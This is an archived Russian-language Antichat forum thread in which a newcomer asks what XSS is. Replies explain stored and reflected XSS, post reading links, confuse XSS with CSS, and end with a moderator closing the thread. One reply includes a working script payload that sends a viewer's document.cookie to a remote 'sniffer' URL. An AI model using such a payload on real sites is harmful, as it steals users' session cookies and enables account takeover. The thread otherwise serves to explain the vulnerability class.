Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
Что такое ксс, и с чем его едят? |

22.09.2006, 14:45
|
|
Познающий
Регистрация: 15.09.2006
Сообщений: 36
Провел на форуме: 324272
Репутация:
28
|
|
Что такое ксс, и с чем его едят?
Думаю из названия понятно. Надеюсь на вашу помощь!
|
|
|

22.09.2006, 14:58
|
|
Постоянный
Регистрация: 21.06.2006
Сообщений: 931
Провел на форуме: 4836047
Репутация:
930
|
|
Если коротко, то
XSS(активные и пассивные)
Уязвимости класса xss в сущности сводятся к тому, что пользователь может внедрить в страницу произвольный html-код. Это может случиться если фильтрация вводимых символов организованна некорректно(или её вопще нет).
Часто подобные аттаки организуются через любые поля ввода.Эти уязвимости делятся на две подкатегории: активный xss и пассивный xss.
Ативный xss-исполнение html кода, без "активных" действий пользователя. На примере форума: плохой программист не позаботился о фильтрации html тегов,
тогда злой дядька пишет сообщение
"Привет, какой классный у вас форум <script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>"
в результате просмотра этого сообщения пользователем его cookie "уплывут" на "сниффер".
Перейдём к пассивному XSS. Отличается от активного он тем, что для успешного проведения атаки пользователь должен пройти по специально составленной, предложенной ему ссылке, ведущей куда-либо на том же сайте откуда мы хотим увести куки. Обычно для такой атаки используются адресная строка браузера,поле search(работающее методом get),либо фрейм.
Вот тебе ссылка, почитай, там все подробно написано http://www.webfile.ru/1117230
Вот еще http://paradox.3bb.ru/viewtopic.php?pid=43
p.s.а самая главная ссылка это вот
http://www.google.com.ua/search?hl=uk&ie=windows-1251&q=%C2%F1%E5+%EE+XSS&meta=
и
www.google.com\ru\ua
www.ya.ru
www.rambler.ru
www.aport.ru 
Последний раз редактировалось Ksander; 22.09.2006 в 16:12..
|
|
|

22.09.2006, 16:05
|
|
Познающий
Регистрация: 05.07.2006
Сообщений: 93
Провел на форуме: 260548
Репутация:
18
|
|
Rtfm!
======
Пока устный выговор. Впредь пиши по сути дела
DRON-ANARCHY
Последний раз редактировалось DRON-ANARCHY; 22.09.2006 в 16:56..
|
|
|

22.09.2006, 18:36
|
|
Участник форума
Регистрация: 19.03.2006
Сообщений: 286
Провел на форуме: 2547059
Репутация:
144
|
|
вот ссылки на статьи:
http://www.forum.antichat.ru/thread11807.html
http://antichat.ru/crackchat/HTML/
http://forum.antichat.ru/thread20140.html
читай и учи!!! =)
|
|
|

23.09.2006, 01:34
|
|
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
Провел на форуме: 2805813
Репутация:
1396
|
|
да, и еще одна:
http://www2.packetstormsecurity.org
Практика - Лучший учитель...имхо
|
|
|

23.09.2006, 18:43
|
|
Постоянный
Регистрация: 11.12.2004
Сообщений: 592
Провел на форуме: 2260903
Репутация:
345
|
|
Если я тебя правельно понял, то вот http://www.w3.org/Style/CSS/
А редактировать CSS можно с помощью "офисной утилиты" FrontPage
Ну а если не правельно, то х с ним.
|
|
|

23.09.2006, 23:52
|
|
Banned
Регистрация: 22.08.2006
Сообщений: 608
Провел на форуме: 6144796
Репутация:
1095
|
|
Сообщение от max_pain89
Если я тебя правельно понял, то вот http://www.w3.org/Style/CSS/
А редактировать CSS можно с помощью "офисной утилиты" FrontPage
Ну а если не правельно, то х с ним.
Наверно все-таки неправильно...
Если вопрос по каск. таблицам - то это не в тот раздел тема (да и вообще, не в тот форум...)
|
|
|

23.09.2006, 23:58
|
|
Leaders of Antichat - Level 4
Регистрация: 16.01.2006
Сообщений: 1,966
Провел на форуме: 21768337
Репутация:
3486
|
|
На вопрос ответили с избытком. Привели много ссылок. Теперь только читать и понимать, а тут уже помочь никак. Тема закрыта.
ЗЫ Если будет очень уж большая неоюходимость здесь отпостить, пишите в ПМ, тему открою
Последний раз редактировалось [sL1p]; 24.09.2006 в 00:03..
|
|
|
|
 |
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|